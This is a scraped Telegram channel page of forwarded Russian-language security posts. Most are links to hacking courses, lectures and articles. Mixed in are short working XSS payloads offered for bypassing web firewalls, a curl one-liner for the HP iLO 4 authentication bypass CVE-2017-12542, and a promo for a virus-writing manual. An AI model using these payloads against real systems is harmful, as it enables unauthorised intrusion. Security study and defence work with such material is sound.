Telegram Web Link
Forwarded from CryptoEarn
Разрабатываем собственный вирус.

Думаю будет всем полезна эта инфа, так как многие очень любят повредничать с вирусами- даю возможность, пользуйтесь мануалом.

Другая сторона медали, читайте статью, будьте в курсе, как могут к вам проникнуть, что сделать.
ЧИТАТЬ.
Полный курс по этичному взлому — от начального до продвинутого уровня Kali Linux

Рассмотрены вопросы взлома Wi-Fi, сканирования уязвимостей, анализа вредоносного ПО и эксплуатации, тестирования на проникновение и этичного хакинга.

Ссылка на плейлист: https://www.youtube.com/watch?v=r4tK4ifayF8&list=PLPxEwGlYuJQlGUzoAoZsNlSHjIgRUe9dU
XSS с помощью css:
<style>img{background-image:url('javascript:alert(1)')}</style>

Обход фаерволов:
<style>*{background-image:url('\6A\61\76\61\73\63\72\69\70\74\3A\61\6C\65\72\74\28\6C\6F\63\61\74\69\6F\6E\29')}</style>
«Это должно быть в общем доступе?» - статья об эксплуатации google дорков
https://goo.gl/qWK6tL
Forwarded from ITpro News & Reviews
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Нет, я не сошёл с ума, это я взламываю ваш IPMI iLO от HP. ж)

В открытом доступе опубликован эксплоит для уязвимости (CVE-2017-12542) в Hewlett Packard Integrated Lights-Out 4 (HP iLO 4), которая связана с обходом аутентификации и позволяет удаленно получить доступ к консоли. Воспользоваться уязвимостью достаточно просто, необходимо выполнить cURL-запрос с 29 буквами А: curl -H "Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

Четвертая версия у нас шла в серверах ProLiant Gen8 и Gen9. Проблема затрагивает только версию прошивки серверов HP iLO 4 2.53 и ниже.

PoC-эксплоиты можно посмотреть здесь, здесь, а здесь доступен модуль для Metasploit.

Решение? Обновить HP iLO до 2.54 и выше, забирать тут - http://www.hpe.com/support/ilo4
Forwarded from HackerOne (xDD)
165.pdf
3.4 MB
Find Evil - know normal. \n hunting malware document
Необычный payload, закодирован в base64, может пригодится при обходе фильтра web фаервола
<svg/onload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;//>
Кража паролей: как наши учетные записи уводят через npm-пакет

https://proglib.io/p/steal-password/

#common #security
Forwarded from Deleted Account
Настройка UFW в Ubuntu Server 16.04 на примере BigBlueButton

UFW (Uncomplicated Firewall) – это интерфейс iptables, предназначенный для упрощения процесса настройки брандмауэра. Инструмент iptables надёжный и гибкий, но новичку будет непросто настроить его самостоятельно. Я как раз новичок в этом деле.


По умолчанию в iptables включена политика ACCEPT и выглядет это так:
Читать дальше →

Source: https://habr.com/post/420973/?utm_campaign=420973
Forwarded from Deleted Account
[Перевод] Курс MIT «Безопасность компьютерных систем». Лекция 7: «Песочница Native Client», часть 1

Массачусетский Технологический институт. Курс лекций #6.858. «Безопасность компьютерных систем». Николай Зельдович, Джеймс Микенс. 2014 год

Computer Systems Security — это курс о разработке и внедрении защищенных компьютерных систем. Лекции охватывают модели угроз, атаки, которые ставят под угрозу безопасность, и методы обеспечения безопасности на основе последних научных работ. Темы включают в себя безопасность операционной системы (ОС), возможности, управление потоками информации, языковую безопасность, сетевые протоколы, аппаратную защиту и безопасность в веб-приложениях.


Лекция 1: «Вступление: модели угроз» Часть 1 / Часть 2 / Часть 3

Лекция 2: «Контроль хакерских атак» Часть 1 / Часть 2 / Часть 3

Лекция 3: «Переполнение буфера: эксплойты и защита» Часть 1 / Часть 2 / Часть 3

Лекция 4: «Разделение привилегий» Часть 1 / Часть 2 / Часть 3

Лекция 5: «Откуда берутся ошибки систем безопасности» Часть 1 / Часть 2

Лекция 6: «Возможности» Часть 1 / Часть 2 / Часть 3

Лекция 7: «Песочница Native Client» Часть 1 / Часть 2 / Часть 3 Читать дальше →

Source: https://habr.com/post/418223/?utm_campaign=418223
Forwarded from Deleted Account
[Из песочницы] Изучаем Adversarial Tactics, Techniques & Common Knowledge (ATT@CK). Часть 1

Часть 1. Вступление. Получение первоначального доступа
Данной публикацией я хотел бы начать цикл постов, посвященных описанию основных техник, применяемых злоумышленниками на различных этапах осуществления хакерских атак.
Излагаемый материал будет является свободным пересказом содержания матриц Adversarial Tactics, Techniques & Common Knowledge (ATT@CK) от компании The Mitre:

PRE-ATT&CK (техники подготовительных стадий атаки);

ATT&CK Matrix for Enterprise (техники атаки на корпоративные системы);

ATT&CK Mobile Profile (техники атак на мобильные устройства).

Читать дальше →

Source: https://habr.com/post/423405/?utm_campaign=423405
61 репозиторий для хакеров на Github

Огромная подборка полезных вещей, инструментов, книг и прочих источников для хакеров, тестировщиков на проникновение и исследователей в области информационной безопасности.

https://proglib.io/p/hacking-repositories/
Forwarded from Br0wSec (Andrey Kovalev)
Ещё одна интересная подборка PoC’ов под memory corruption уязвимости в V8 и ChakraCore (2013 - 2019): https://github.com/tunz/js-vuln-db.
Forwarded from Deleted Account
Фингерпринтинг через рекламные баннеры? Теперь это обычное дело

Вчера на Stack Overflow задали странный вопрос: почему загрузка страницы Stack Overflow инициирует аудиоконтент? Что за звук на текстовом сайте?


Скриншот из инструментов разработчика:





Ответ оказался интереснее, чем можно было предположить.
Читать дальше →

Source: https://habr.com/ru/post/458022/?utm_campaign=458022&utm_source=habrahabr&utm_medium=rss
2024/05/15 22:16:32
Back to Top
HTML Embed Code: